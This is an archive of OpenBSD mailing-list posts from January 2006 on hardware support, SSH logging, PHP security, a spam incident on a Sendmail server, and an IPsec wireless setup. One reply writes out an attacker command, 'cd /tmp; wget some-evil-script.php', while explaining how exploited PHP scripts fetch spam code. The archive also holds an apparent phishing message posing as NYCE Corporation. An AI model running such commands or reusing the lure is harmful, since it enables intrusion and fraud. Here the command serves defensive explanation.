tcpdump and 802.1d-support?
Is it planed that tcpdump will get support for 802.1d-Packets? Currently it reports that this type is an unknown packet-type. Kind regards, Sebastian
Re: IBM Thinkpad X40, which model?
On Wednesday, 25 January 2006 at 15:17:27 +0800, [EMAIL PROTECTED] wrote: I wonder which model is supported best by 3.8 or the coming 3.9. 2371-HSM works just fine on 3.8 current. Can hibernate work in X mode for that model ? CPU speed, video graphics, Wifi, etc... are not that important to me. The X40 comes with 3 macs out of the box...it's BUILT for wifi... I suggest you look elsewhere. No. What I really mean is 10Mbps or 54Mbps Wifi is no much a worry for me. Same as 1MB or 2MB cache. I have decided the X40. I want this laptop to run only OBSD and I travel a lot so I want a light weight one. I just want to know from the experience of the users in this list which particular model of the X40 works best in 3.8. Thanks, Zoong
Re: SSH publickey authentication - identity logging
Spruell, Darren-Perot skrev: From: Joachim Schipper [mailto:[EMAIL PROTECTED] Our situation is that we have a user account that multiple people have access to log into to retrieve files. Each user authenticates to that account with their own SSH key. Current log entry shows: Jan 24 11:01:20 sftp sshd[23555]: Accepted publickey for transfers from 10.2.58.44 port 1420 ssh2 Would be useful to have information logged for the connection identifying the key used to authenticate, by the key comment if possible. Does sshd already have this capability? Would anyone consider this a useful feature addition? Only if you can provide a good reason this can not be implemented as a couple of users and a shared group, combined with a group-writable directory. We require that the users be chroot'd to the home directory, so we'd probably have to break the chroot to have a commonly writable directory...? sharing user accounts should be avoided if possible. i can't see why your situation would demand parting with good practices, if there aren't more particularities that you have left out. tips: * use permissions and directory structuring creatively. * you don't have to chroot all the way to the actual homedir. * users don't even have to have separate homedirs. * contenmplate what user privileges don't mix with chrooting. * test, test, test.
Re: SSH publickey authentication - identity logging
On Tue, Jan 24, 2006 at 04:31:39PM -0700, Spruell, Darren-Perot wrote: From: Joachim Schipper [mailto:[EMAIL PROTECTED] Our situation is that we have a user account that multiple people have access to log into to retrieve files. Each user authenticates to that account with their own SSH key. Current log entry shows: Jan 24 11:01:20 sftp sshd[23555]: Accepted publickey for transfers from 10.2.58.44 port 1420 ssh2 Would be useful to have information logged for the connection identifying the key used to authenticate, by the key comment if possible. Does sshd already have this capability? Would anyone consider this a useful feature addition? Only if you can provide a good reason this can not be implemented as a couple of users and a shared group, combined with a group-writable directory. We require that the users be chroot'd to the home directory, so we'd probably have to break the chroot to have a commonly writable directory...? I don't know what method you use for that, but quite a few are flawed. It's not part of stock sshd last I checked, either. (Though it'd be neat.) Anyway, create a /home/workgroup in which to chroot, /home/workgroup/shared for the group-writable documents, and /home/workgroup/dave and so on for the users. This, of course, breaks as soon as someone is in more than two groups (some hacks might still be possible, but this will soon grow out of control). However, as to an actual solution, use the command= syntax in authorized_keys (see sshd(8), under 'AUTHORIZED_KEYS FILE FORMAT', as was pointed out to me on misc@ this week) to differentiate between keys,if desired. It's not occuring how a command= option could be used to provide logging of which key was used to authenticate as that user. What did you have in mind? Something like command=/usr/local/bin/logme dave,no-port-forwarding,no-X11-forwarding ---hexblob for the key--- dave With #!/bin/ksh /usr/bin/logger -t Dave logged in exec $SHELL Of course, a compiled version of the above resists problems with the environment scrubbing a lot better, and might be preferable. This is not perfect though, as it is possible to run ssh without executing a command. no-port-forwarding and no-X11-forwarding take away any useful application of this, as far as I know. It is also inconvenient, as I rather like the ability to run a quick command on a remote host, but it does work. Joachim
Re: webstore software: safe and configurable?
On Tue, Jan 24, 2006 at 04:45:53PM -0700, Bob Beck wrote: However, all this mitigating points taken together do not suffice to convince me that PHP is the language to choose if you want to lead a quiet, secure life. Language has very little to do with it. The code that is written in the language is ususally the problem :) ... [1] Though this is a bit of an abuse in statistics; open source web applications are full of easy-to-find holes, and since PHP has almost a monopoly there and is almost never used elsewhere, so are almost all PHP applications. It would not be unreasonable to say that a large portion of web applications is just badly written. The point stands that PHP makes it too easy to write bad code, but still. ... People write bad code in everything. The way people write software and heave it out the door to the slobbering masses that don't care about how bad it works has everything to do with it. Nothing will change until programmers of the applications are in general, smarter. That won't change without some evolutionary pressure to make them so, the only thing that will do that is people refusing to run crap and pushing back. Turning I don't like running crap into I don't like running language X is not helpful in this regard - the crap writers just move to another language-du-jour, make another application and pop up somewhere else - it's like playing whack-a-turd. I don't like running crap no matter what it's written in. Yes, I'm sometimes forced, I spent today fixing imp/horde and mysql issues. My crap-o-meter is overfull, I feel dirty - someone needs to send me some nice wholesome german scheisse porn so I can be convinced that not all the world is so smeared full of crap as the software I spent today looking at. All good points. That, however, still leaves my point standing that by evading PHP, you evade the worst crap. I agree that it's possible to do really stupid things in any language (though I think PHP makes it far too easy[1][2]), and that webmonkeys (sorry, web application developers who have not yet reached the epitome of their art) will always write crap in whatever the language-du-jour is. On a side note, hand-writing your own web scripts helps you evade almost all of the crap - or at least, it'll be *your* crap. However, since one has to deal with the pile of crap that is MSIE anyway (--- long rant deleted ---), best to steer clear of web development at all. Which, on a side note to this side note, does a very good job; The Crap is still Out There, of course, but being rid of it as soon as you close your browser is a good thing. All this has no bearing on the fact that PHP, as a language, has a lot of holes. This is independent of the programs you write in it, though only having well-written programs on a server might make the problems (almost) impossible to exploit. As to IMP, I still haven't got it working. Might have something to do with my reluctance to run two versions of PHP, and my unwillingness to indulge crap that still demands PHP4. Another try coming up, probably... (though at least I can use PostgreSQL, which I far prefer to MySQL). Joachim [1] Whoever made up such works of genius as register_globals, regexes which execute stuff, and XML-RPC: all the world thanks you for it. [2] I've also heard it say that quite a few modern scripting languages are far too easy; this might be, to some extent, true, as a language like C - full of obscure portability problems, NULL dereferences, hard-to-find bugs which only rear their ugly head to shout SIGSEGV once in a while - does scare off most of the monkeys. Then again, at least PHP doesn't have buffer overflows (or, rather, at least programs written in PHP don't/shouldn't have buffer overflows).
Re: IBM Thinkpad X40, which model?
Zoong, Perhaps you should take a look at: http://www.openbsd.org/i386-laptop.html -- Warm regards, Kevin Foo Key fingerprint : 4B23 FC1C E50B 9693 CCDD 2A7D A048 E909 8924 9BDD Public key : http://keyserver.linux.it/pks/lookup?op=getsearch=0xA048E90989249BDD On Wednesday 25 January 2006 17:14, Zoong PHAM wrote: On Wednesday, 25 January 2006 at 15:17:27 +0800, [EMAIL PROTECTED] wrote: I wonder which model is supported best by 3.8 or the coming 3.9. 2371-HSM works just fine on 3.8 current. Can hibernate work in X mode for that model ? CPU speed, video graphics, Wifi, etc... are not that important to me. The X40 comes with 3 macs out of the box...it's BUILT for wifi... I suggest you look elsewhere. No. What I really mean is 10Mbps or 54Mbps Wifi is no much a worry for me. Same as 1MB or 2MB cache. I have decided the X40. I want this laptop to run only OBSD and I travel a lot so I want a light weight one. I just want to know from the experience of the users in this list which particular model of the X40 works best in 3.8. Thanks, Zoong [demime 1.01d removed an attachment of type application/pgp-signature]
FSC D1627-C and hw.sensors
Hello. I have a Fujitsu Siemens D1627-C motherboard and with OpenBSD 3.9-beta (dmesg at end) I can not see any hw.sensors. # /sbin/sysctl hw hw.machine=i386 hw.model=Intel(R) Pentium(R) 4 CPU 3.20GHz (GenuineIntel 686-class) hw.ncpu=1 hw.byteorder=1234 hw.physmem=1072717824 hw.usermem=1072488448 hw.pagesize=4096 hw.disknames=cd0,cd1,wd0 hw.diskcount=3 hw.cpuspeed=3192 hw.setperf=100 In Microsoft Windows XP (SP2) I use the program SpeedFAN, which prints the following log Win9x:NO 64Bit:NO GiveIO:YES SpeedFan:YES I/O properly initialized Linked ISA BUS at $0290 Linked Intel 82801EB ICH5 SMBUS at $2000 Scanning ISA BUS at $0290... SuperIO Chip=LPC47m967 Scanning Intel SMBus at $2000... FS Hermes (REV=$10) found on SMBus at $73 SMART Enabled for drive 0 Found WDC WD2500PD-07FZB1 (250,1GB) End of detection Error loading event -- CfgVersion=01.0001 EventsVersion=01.0001 Loaded 0 events and then shows Fan1: 0 RPM Fan2: 1320 RPM Fan3: 1400 RPM where Fan1 seems to be a ghost without connector, Fan2 is the CPU fan and Fan3 is an extra fan connector on the motherboard. It also shows Temp1: 35 C Temp2: 26 C Temp3: 127 C HD0: 23 C where Temp1 is the CPU temp, Temp2 is some kind of case temp and Temp3 always says 127 C. HD0 I think is read from SMART. It also shows the voltage for +12, +5 and vbat. Is this and odd Fujitsu Siemens sensor that OpenBSD does not yet support? Jan J OpenBSD 3.9-beta (GENERIC) #591: Thu Jan 19 12:32:39 MST 2006 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC cpu0: Intel(R) Pentium(R) 4 CPU 3.20GHz (GenuineIntel 686-class) 3.20 GHz cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,CNXT-ID real mem = 1072717824 (1047576K) avail mem = 972111872 (949328K) using 4278 buffers containing 53739520 bytes (52480K) of memory mainbus0 (root) bios0 at mainbus0: AT/286+(c0) BIOS, date 10/11/04, BIOS32 rev. 0 @ 0xfd6c0 apm0 at bios0: Power Management spec V1.2 apm0: AC unknown, no battery apm0: flags 30102 dobusy 0 doidle 1 pcibios0 at bios0: rev 2.1 @ 0xfd6c0/0x940 pcibios0: PCI IRQ Routing Table rev 1.0 @ 0xfdef0/240 (13 entries) pcibios0: PCI Interrupt Router at 000:31:0 (Intel 82371FB ISA rev 0x00) pcibios0: PCI bus #2 is the last bus bios0: ROM list: 0xc/0xd000 0xcd000/0x1800 cpu0 at mainbus0 pci0 at mainbus0 bus 0: configuration mode 1 (no bios) pchb0 at pci0 dev 0 function 0 Intel 82865G/PE/P CPU-I/0-1 rev 0x02 ppb0 at pci0 dev 1 function 0 Intel 82865G/PE/P CPU-AGP rev 0x02 pci1 at ppb0 bus 1 vga1 at pci1 dev 0 function 0 ATI Radeon 9200 PRO rev 0x01 wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation) wsdisplay0: screen 1-5 added (80x25, vt100 emulation) ATI Radeon 9200 PRO Sec rev 0x01 at pci1 dev 0 function 1 not configured uhci0 at pci0 dev 29 function 0 Intel 82801EB/ER USB rev 0x02: irq 11 usb0 at uhci0: USB revision 1.0 uhub0 at usb0 uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub0: 2 ports with 2 removable, self powered uhci1 at pci0 dev 29 function 1 Intel 82801EB/ER USB rev 0x02: irq 10 usb1 at uhci1: USB revision 1.0 uhub1 at usb1 uhub1: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub1: 2 ports with 2 removable, self powered uhci2 at pci0 dev 29 function 2 Intel 82801EB/ER USB rev 0x02: irq 9 usb2 at uhci2: USB revision 1.0 uhub2 at usb2 uhub2: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub2: 2 ports with 2 removable, self powered uhci3 at pci0 dev 29 function 3 Intel 82801EB/ER USB rev 0x02: irq 11 usb3 at uhci3: USB revision 1.0 uhub3 at usb3 uhub3: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub3: 2 ports with 2 removable, self powered ehci0 at pci0 dev 29 function 7 Intel 82801EB/ER USB2 rev 0x02: irq 5 usb4 at ehci0: USB revision 2.0 uhub4 at usb4 uhub4: Intel EHCI root hub, rev 2.00/1.00, addr 1 uhub4: 8 ports with 8 removable, self powered ppb1 at pci0 dev 30 function 0 Intel 82801BA AGP rev 0xc2 pci2 at ppb1 bus 2 fxp0 at pci2 dev 8 function 0 Intel PRO/100 VE rev 0x02, i82562: irq 11, address 00:30:05:60:93:05 inphy0 at fxp0 phy 1: i82562ET 10/100 PHY, rev. 0 fxp1 at pci2 dev 11 function 0 Intel 8255x rev 0x0c, i82550: irq 10, address 00:02:b3:2b:b2:89 inphy1 at fxp1 phy 1: i82555 10/100 PHY, rev. 4 vendor Conexant, unknown product 0x8800 (class multimedia subclass video, rev 0x05) at pci2 dev 13 function 0 not configured vendor Conexant, unknown product 0x8811 (class multimedia subclass miscellaneous, rev 0x05) at pci2 dev 13 function 1 not configured emu0 at pci2 dev 15 function 0 Creative Labs SoundBlaster Audigy rev 0x04: irq 5 ac97: codec id 0x83847650 (SigmaTel STAC9750/51) ac97: codec features headphone, 20 bit DAC, 20 bit ADC, SigmaTel 3D audio0 at emu0 Creative Labs SoundBlaster Audigy Digital rev 0x04 at pci2 dev 15 function 1 not configured Creative Labs Firewire rev 0x04 at pci2 dev 15 function 2 not configured ichpcib0 at pci0 dev 31 function 0 Intel 82801EB/ER LPC rev 0x02 pciide0 at pci0 dev 31 function 1 Intel 82801EB/ER IDE
Online Account Access
[IMAGE] Dear NYCE Corporation valued member, our company recently issued a new feature regarding our services to you, Online Access to your accounts! Accessing your NYCE account over the Internet is easier than you might think! Check balances, get transaction histories, pay bills, transfer funds and more. Please take 10 minutes off your time, access the link bellow, and get started on enrolling yourself! http://online.nyce.net/ ) 2006 NYCE CORPORATION, Member FDIC. Equal Housing Lender Thank You for your prompt attention to this matter! * Please do not reply to this message. For any inquiries, contact Customer Service. [IMAGE][IMAGE]
Re: SSH, sftp-server subsystem not logging to utmp ?
On Mon, Jan 23, 2006 at 11:10:16PM +0200, turha turha wrote: users are added, I'm guessing sftp-server doesn't inherit this functionality from ssh either, so is there any place to adjust the behavior ? or am I supposed to use some other tool to monitor sftp usage ? authlog shows: date host sshd[pid]: subsystem request for sftp after( obviously) succesfull login, and lastcomm(1) gives some info too. - Lukasz Sztachanski -- 0x058B7133 // 16AB 4EBC 29DA D92D 8DBE BC01 FC91 9EF7 058B 7133 http://szati.blogspot.com http://szati.entropy.pl
Possible implication of a Sendmail on OpenBSD 3.8 in a spam attack
Sorry to bother you, but I would like to show you some aspects about how a Sendmail running on an OpenBSD 3.8 system can be involved in a spam attack. I'm not quite sure that OpenBSD 3.8 or Sendmail are exploitable, but I would like some help to clarify this problem. More precisely, one day I've noticed that /var/spool/mqueue was full with 3 messages (in fact return messages, showing that some servers including Yahoo! do not accept some mails from me). I've noticed that the mailstats command reports 13 (!!!) messages sent (!) outside. My computer is a small server running OpenBSD 3.8, MySQL+PHP+Apache for the website; it's a FRESH install so that I don't think it's a problem in the system. I have around 30 users that use POP3+Outlook Express to send and receive their mail messages. The problem is that I have antispoofing on, scrub in all; some suspect (probably Windows machines from the neighbouring departament which are supposed to have some viruses are bloked through the PF). I also have NAT for my local network (192.128.x.x) and ip forwarding for the global addresses. Relaying is stopped so this could not be a problem (Yahoo! asks me if I am am open-relay!). My machine seems quite secure, but I cannot say why my machine sends so much mail messages (day night). Maybe some accounts are compromised, but I have no way of determining this. How can I see how many mail messages a user sends? I don't think this is an ordinary problem. I have some experience on FreeBSD (2 years) and on OpenBSD; moreover, I have 2.5 years of experience with GNU/Linux systems. Maybe this is a simple problem, but I can't solve it all by myself and thus I now requested help from our great OpenBSD community. My OpenBSD 3.8 system was not patched and the kernel was not recompiled. Thank you very much for your attention and I hope someone can help me with this (could it be problem with Sendmail on OpenBSD 3.8? - I really don't think this could happen). Respectfully yours, George Popa
Re: Possible implication of a Sendmail on OpenBSD 3.8 in a spam attack
On Wed, 2006-01-25 at 14:09 +0200, Gabriel George POPA wrote: small server running OpenBSD 3.8, MySQL+PHP+Apache for the website; I'd look here. Check out: http://secunia.com/advisories/17763/ You didn't post anything from maillog or headers of a rejected message, so this is only a guess. You need to look in /var/log/maillog and see where those messages are coming from. Also, look in php.ini and turn on debugging. Try disabling the php application and see if the messages stop. -- James Strandboge [EMAIL PROTECTED]
Security announces
http://docs.freebsd.org/cgi/mid.cgi?200601251013.k0PAD9lO059018 looks like http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net/if_bridge.c.diff?r1=1.147r2=1.148
OpenBGPD status
Over the last few weeks a lot of developement happened in OpenBGPD. Many minor bugs were found and fixed. Additionaly some memory leaks were plugged and the overall memory consumption was reduced. Now this would not be enough to make me write such a mail but we added a new important feature: Softreconfig in. Since a couple of month OpenBGPD was already doing softreconfig out. In other words on configuration reloads the output filter are rerun and the announced prefixes are correctly updated. Now with softreconfig in we do the same thing for the incomming filters. So reloading bgpd no longer results in unexpected RIB contents until you clear all sessions. Now the RIB is adjusted on reloads and so the result is always consistent. In the end it is no longer necessary to clear sessions on reload or even restart bgpd. To implement this feature many complex changes had to be done in the RDE. Instead of duplicating every update and store it in different tables OpenBGPD merges these tables and so only changed entries are duplicated. This will reduce the memory overhead of softreconfig in drastically. Both zebra/quagga and ciscos bgpd double more or less the memory consumtion if softreconfig in is enabled. So OpenBGPD users this is now a good time to install a -current snapshot on your test machines and play around with these new feature(s). This will help us to make softreconfig as solid as the rest of OpenBGPD. Thanks -- :wq Claudio PS: here some small statistics from one of my test systems. The box is a Via C3 with 512M RAM and 11 full feeds # bgpctl show rib mem RDE memory statistics 177558 IPv4 network entries using 5.4M of memory 1920275 prefix entries using 58.6M of memory 355777 BGP path attribute entries using 23.1M of memory 324123 BGP AS-PATH attribute entries using 9.6M of memory, and holding 355777 references 7188 BGP attributes entries using 169K of memory and holding 289419 references 7187 BGP attributes using 122K of memory RIB using 96.9M of memory
Re: Possible implication of a Sendmail on OpenBSD 3.8 in a spam attack
...on Wed, Jan 25, 2006 at 02:09:58PM +0200, Gabriel George POPA wrote: Yahoo! do not accept some mails from me). I've noticed that the mailstats command reports 13 (!!!) messages sent (!) outside. My computer is a small server running OpenBSD 3.8, MySQL+PHP+Apache for the website; it's a FRESH install so that I don't think it's a problem in the system. I have around 30 users that use POP3+Outlook Express to send and receive their mail messages. It's quite unprobable that your box can be used as relay without some additional software or some sort of configuration problem. How about some more info on what you are running on that web site? The usual feedback script abuse comes to mind. Also, you have all the logfiles on your machine, try to single out a specific spam message (I assume you have a few samples) and find out how it came into your system. Alex.
Re: Possible implication of a Sendmail on OpenBSD 3.8 in a spam attack
On 2006/01/25 14:09, Gabriel George POPA wrote: More precisely, one day I've noticed that /var/spool/mqueue was full with 3 messages (in fact return messages, showing that some servers including Yahoo! do not accept some mails from me). Some people send bulk email by putting the intended recipient in the *sender* address in the envelope. Recipient address needs to be something that will generate a bounce message (rather than an SMTP error code) in an attempt to get the message body returned as part of the bounce message (I was told some years ago that people used to do this in the early days of email to avoid charges for sending messages on some pay-per-message systems). OpenBSD sendmail configuration files (at least on -current, I don't recall when it was added) use the nobodyreturn privacy flag in the mc-file, to make this a less-than-successful operation (since the intended payload isn't carried in the bounce report). This may or may not be the problem you're seeing: you'll have to look at the headers in the queued emails and analyse them to find out for sure.
Re: Possible implication of a Sendmail on OpenBSD 3.8 in a spam attack
On Wednesday 25 January 2006 12:09, you wrote: ... I've noticed that the mailstats command reports 13 (!!!) messages sent (!) outside. My computer is a small server running OpenBSD 3.8, MySQL+PHP+Apache for the website; There's one potential smoking gun right there. PHP. You know PGP stands for 'Pretty Good Privacy'? Well, I think PHP stands for 'Pretty Hopeless Privacy'. What PHP scripts are you or your users running? Any phpbb installations? *nukes? What other PHP scripts are installed? phpbb and the various nukes are notorious for exploits. It is quite often the case that well known PHP scripts are getting exploited - I've seen it twice in the field where a PHP script was exploited by phishers/spammers. The general sequence of events is: 1. User installs exploitable PHP script 2. Phisherman finds it. 3. Phisherman exploits it, and using the shell execution exploit, executes 'cd /tmp; wget some-evil-script.php' and then exploits it again to run /tmp/some-evil-script.php (in PHP command line mode). Some-evil-script.php turns out to be a spamming script. They don't need to root your server, they just need to be able to write somewhere. Have a poke around where Apache has write access, I bet you find some dodgy PHP scripts. Look through the logs for attempted exploits on PHP scripts (you can usually find %-encoded versions of commands in the arguments to the PHP script). The other possibility is one of your users has a virus/trojan/worm that uses their Outlook settings to relay mail through your mail server. Tell your users to relay through their ISP only, you just don't want to get involved with being the mail relay for your users if you can help it. However, I suspect you've been exploited via a buggy insecure PHP script. To stop this happening again: Apply strict egress filtering. Allow *no traffic out at all*. There is probably no reason your server should be making any outbound connections except via a few daemons (DNS and outbound SMTP spring to mind - for those use 'pf' rules that only allow BIND and sendmail to send data out on those ports). Strict egress filtering will prevent phishers/spammers from managing to do the 'wget some-evil-script.php' to get the spamming script onto your server. No, 'chmod 700 wget' is no substitute - it's trivial to write a Perl script that can be injected via your vulnerable PHP script to do open a socket to a remote server and download a file. Block ALL OUTBOUND ACCESS to anything except for what explicitly should happen: DNS lookups to the two or three DNS servers listed in resolv.conf, and SMTP access (if you absolutely cannot avoid allowing outbound SMTP) to the sendmail process only (user _sendmail). Egress filtering is often forgotten, missed or not considered - but it is every bit as important as filtering inbound traffic (possibly more so, as y ou have discovered). Never forget egress filtering. And keep an eye on your users - particularly what PHP scripts they have installed. Apply a LART if they don't keep up to date with security patches. Have a policy of banning scripts known to have a bad security track record.
OpenBSD-specific plugins for Munin, anyone?
Hi, I've recently been playing with Munin again (http://munin.projects.linpro.no/), and noticed there are nearly no plugins for OpenBSD. While I have adapted a few for my needs, I shurely can't be the first to do that? (Munin is a(nother) simple, low-configuration software using rrdtool to create pretty graphs of different things happening on networked systems. I'm using it because I'm lazy. Having to write my own plugins is bad in that respect.) Alex.
RE: Re: webstore software: safe and configurable?
[EMAIL PROTECTED] wrote: [snip] All good points. That, however, still leaves my point standing that by evading PHP, you evade the worst crap. True, but that is the same as that by evading ENGLISH as a lnaguage in posts, you evade the worst crap. If these discussions were carried out in classical latin, the level of discussion would rise considerably. This is the same as registering automobiles in Antartica because they have fewer accidents there. An oversimplification, but an ill-written application has essentially two choices. It can refuse to run because somebody forgot to dot an i or something, or it can try to run anyway with whatseems reasonable under the circumstances. Ultimately everything is really only some varient of choice number two. (Understand ALL of the foundations of mathematics if you think otherwise.) There is an enormous difference between sometimes doing something right and never doing anything wrong. There was something about an error every few lines in C compilers. You think a webstore something is better?
enable the Fn key of my keyboard in my OpenBSD 3.8
Hi all, Is there any way to enable the Fn key of my keyboard in my OpenBSD 3.8 and configure the delete key? Because right now the delete key is working the same way backspace does, and the Fn key is useless. Thanks. -- Joco Salvatti Undergraduating in Computer Science Federal University of Para - UFPA web: http://salvatti.expert.com.br e-mail: [EMAIL PROTECTED]
Re: Anonym.OS - OpenBSD-based live CD
On Tue, 24 Jan 2006, Bob Beck wrote: SNIP or perhaps a brief dorothy-esque moment of clicking my ruby slippers together and saying ignorance is bliss. SNIP -Bob and what size would those ruby slippers be?
Encrypting content/filesystem on DVD?
Hi, This may not be OpenBSD specific, but I'm looking for a way to encrypt the contents of a DVD such that only a user with the correct passphrase would be able to mount the contents. Sort of an optical equivilent to: vnconfig -ck svnd0 my-encrypted-file mount /dev/svnd0c /mount-point My initial thoughts were to simply store an encrypted vnd file filesystem as the only contents of a normal ISO9660 DVD, mount the DVD as always and then attach a vnd device to the file stored on the DVD using vnconfig, as above. Unfortunately, neither mkisofs (and indeed the iso standard) nor growisofs appear to like 4G+ files ... The encrypted content may represent a reasonable large filesystem in one large file under this scheme. My attempts at burning an ffs filesystem to DVD/CDR to get around the filesize limitation of ISO9660 have been largely unsuccessful. See below for details on the (flawed) procedure I initially attempted. I'm sure I'm missing some crucial details -- blocksizes or similar. As an aside, I'm also curious how one might successfully burn an ffs filesystem to a DVD/CD such that OpenBSD can mount it, if such a thing is even possible. The contents only have to be mounted/read via an OpenBSD box. I'm not concerned with interoperability with other architectures or making the disk bootable. I'm not stuck on any particular method of producing the encrypted contents. Using vnd devices with a large file stored on a standard ISO filesystem only seemed like a logical and familiar approach for me and if the size of the file didn't trample ISO's limits, it would have worked fine, I suspect. I'm open to any suggestions on how else this might be most easily accomplished. Regards, - Paul *** cdrw-ffs filesystem procedure -- comments in () *** *** OpenBSD 3.8 GENERIC *** (create a virtual filesystem) # dd if=/dev/zero of=tst.fs bs=1024 count=10240 # vnconfig -c svnd2 tst.fs # newfs -f 2048 /dev/svnd2c newfs: /dev/svnd2c: not a character-special device Warning: cylinder groups must have a multiple of 8 cylinders Warning: 20 sector(s) in last cylinder unallocated /dev/svnd2c:20480 sectors in 205 cylinders of 1 tracks, 100 sectors 10.0MB in 1 cyl groups (208 c/g, 10.16MB/g, 1408 i/g) super-block backups (for fsck -b #) at: 32, (reference) # disklabel svnd2 # /dev/rsvnd2c: type: SCSI disk: vnd device label: fictitious flags: bytes/sector: 512 sectors/track: 100 tracks/cylinder: 1 sectors/cylinder: 100 cylinders: 204 total sectors: 20480 rpm: 3600 interleave: 1 trackskew: 0 cylinderskew: 0 headswitch: 0 # microseconds track-to-track seek: 0 # microseconds drivedata: 0 16 partitions: # sizeoffset fstype [fsize bsize cpg] c: 20480 0 4.2BSD 2048 16384 208 # Cyl 0 - 204* (put something into the ffs image file - tst.fs) # mkdir tstmnt # mount /dev/svnd2c tstmnt # touch tstmnt/hello_world # umount tstmnt # vnconfig -u svnd2 (burn it ...) (Note: cdrecord installed from binary package using pkg_add crdtools-2.01) # cdrecord -v dev=/dev/rcd0c tst.fs cdrecord: No write mode specified. cdrecord: Asuming -tao mode. cdrecord: Future versions of cdrecord may have different drive dependent defaults. cdrecord: Continuing in 5 seconds... Cdrecord-Clone 2.01 (i386-unknown-openbsd3.8) Copyright (C) 1995-2004 Jvrg Schilling TOC Type: 1 = CD-ROM scsidev: '/dev/rcd0c' devname: '/dev/rcd0c' scsibus: -2 target: -2 lun: -2 Using libscg version 'schily-0.8'. SCSI buffer size: 61440 atapi: 0 Device type: Removable CD-ROM Version: 0 Response Format: 2 Capabilities : Vendor_info: 'PIONEER ' Identifikation : 'DVD-RW DVR-106D' Revision : '1.06' Device seems to be: Generic mmc2 DVD-R/DVD-RW. Current: 0x000A Profile: 0x001B Profile: 0x001A Profile: 0x0014 Profile: 0x0013 Profile: 0x0011 Profile: 0x0010 Profile: 0x000A (current) Profile: 0x0009 (current) Profile: 0x0008 cdrecord: This version of cdrecord does not include DVD-R/DVD-RW support code. cdrecord: If you need DVD-R/DVD-RW support, ask the Author for cdrecord-ProDVD. cdrecord: Free test versions and free keys for personal use are at ftp://ftp.berlios.de/pub/cdrecord/ProDVD/ Using generic SCSI-3/mmc CD-R/CD-RW driver (mmc_cdr). Driver flags : MMC-3 SWABAUDIO BURNFREE Supported modes: TAO PACKET SAO SAO/R96P SAO/R96R RAW/R16 RAW/R96P RAW/R96R Drive buf size : 1267712 = 1238 KB FIFO size : 4194304 = 4096 KB Track 01: data10 MB Total size: 11 MB (01:08.29) = 5122 sectors Lout start: 11 MB (01:10/22) = 5122 sectors Current Secsize: 2048 ATIP info from disk: Indicated writing power: 2 Reference speed: 6 Is not unrestricted Is erasable Disk sub type: High speed Rewritable (CAV) media (1) ATIP start of lead in: -11077 (97:34/23) ATIP start of lead out: 336075 (74:43/00) 1T speed low: 4 1T speed high: 10 2T speed low: 2 2T speed high: 10 power mult factor: 2 6 recommended erase/write power: 5 A1 values: 24 2C DC A2 values: 14 A4 4A A3
Re: IBM Thinkpad X40, which model?
Zoong PHAM [EMAIL PROTECTED] wrote: I plan to get a IBM Thinkpad X40 laptop. I can see at least there are 3 different models. I wonder which model is supported best by 3.8 or the coming 3.9. These are all submodels that only differ in processor speed, memory and disk size, and wireless options. Pick according to those criteria or whatever's conveniently available in your part of the world. -- Christian naddy Weisgerber [EMAIL PROTECTED]
Missing patch and security announce
See http://docs.freebsd.org/cgi/mid.cgi?200601251013.k0PAD9lO059018 Fixed in cvs, but NO patch for 3.8 or 3.7 and NO security announce. (http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net/if_bridge.c.diff?r1=1.147r2=1.148) How does this match http://openbsd.org/security.html#disclosure ? _ Opret en personlig blog og del dine billeder pe MSN Spaces: http://spaces.msn.com/
Re: Missing patch and security announce
On Wed, 2006-01-25 at 16:06:55 +0100, Rob W proclaimed... See http://docs.freebsd.org/cgi/mid.cgi?200601251013.k0PAD9lO059018 Fixed in cvs, but NO patch for 3.8 or 3.7 and NO security announce. (http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net/if_bridge.c.diff?r1=1.147r2=1.148) How does this match http://openbsd.org/security.html#disclosure ? Troll, It's usually best to just troll once and wait for a reply.
Re: tutorial for securing wifi networks with ipsec and openbsd, somewhere?
Didier Wiroth [EMAIL PROTECTED] wrote: I've read man ipsec and vpn. Unfortunately I'm totally new to ipsec and have no ipsec experience. I'm looking for tutorials with samples, URLs or anything else, where I can find additional info on how to secure wifi networks with openbsd's: ipsec and authpf. Okay, this is as good an opportunity as any to write down what I did to my wireless a while ago: Configure dhcpd on the gateway (172.16.1.1) to always give the same address (172.16.1.99) to my laptop, based on its MAC address. Exchange public keys: Copy /etc/isakmpd/private/local.pub from the gateway to /etc/isakmpd/pubkeys/ipv4/172.16.1.1 on my laptop, and the laptop's .../local.pub to .../172.16.1.99 on the gateway. Start up isakmpd -K on both machines. No other isakmpd configuration. None. On the gateway, create a one-line /etc/ipsec.conf: ike esp from any to 172.16.1.99 On the laptop, create a one-line /etc/ipsec.conf: ike esp from ral0 to any peer 172.16.1.1 Run ipsecctl -f /etc/ipsec.conf on both machines. Congratulations, you have set up IPsec. Repeat the same procedure for additional wireless clients. Wait a moment, you say, does that mean that two hosts on the wireless will talk to each other through the IPsec gateway rather than directly? That's right, but in infrastructure mode, i.e., if you use an access point, the packets already cross the air twice (host 1 - AP - host 2). Looping them through the gateway doesn't add appreciable overhead. The wireless clients only need to talk ISAKMP (to authenticate and renegotiate keys) and ESP to the gateway. Block everything else on the gateway: block return on $wlan all pass in on $wlan proto esp to $wlan keep state pass out on $wlan proto esp from $wlan keep state pass in on $wlan proto udp to $wlan port isakmp keep state pass out on $wlan proto udp from $wlan port isakmp keep state Actually, there is one more thing, and it's important. With the setup above, you will run into MTU issues with hosts behind the gateway. The symptom is that bulk data transfers _to_ the wireless host will be redicuously slow or stall completely. There must be a better way, but in the meantime TCP clamping on the gateway works: scrub in on enc0 all max-mss 1318 As far as pf is concerned, all decoded IPsec traffic is from the enc0 interface. If you use the antispoof directive, make sure to add a pass rule for traffic on enc0. -- Christian naddy Weisgerber [EMAIL PROTECTED]
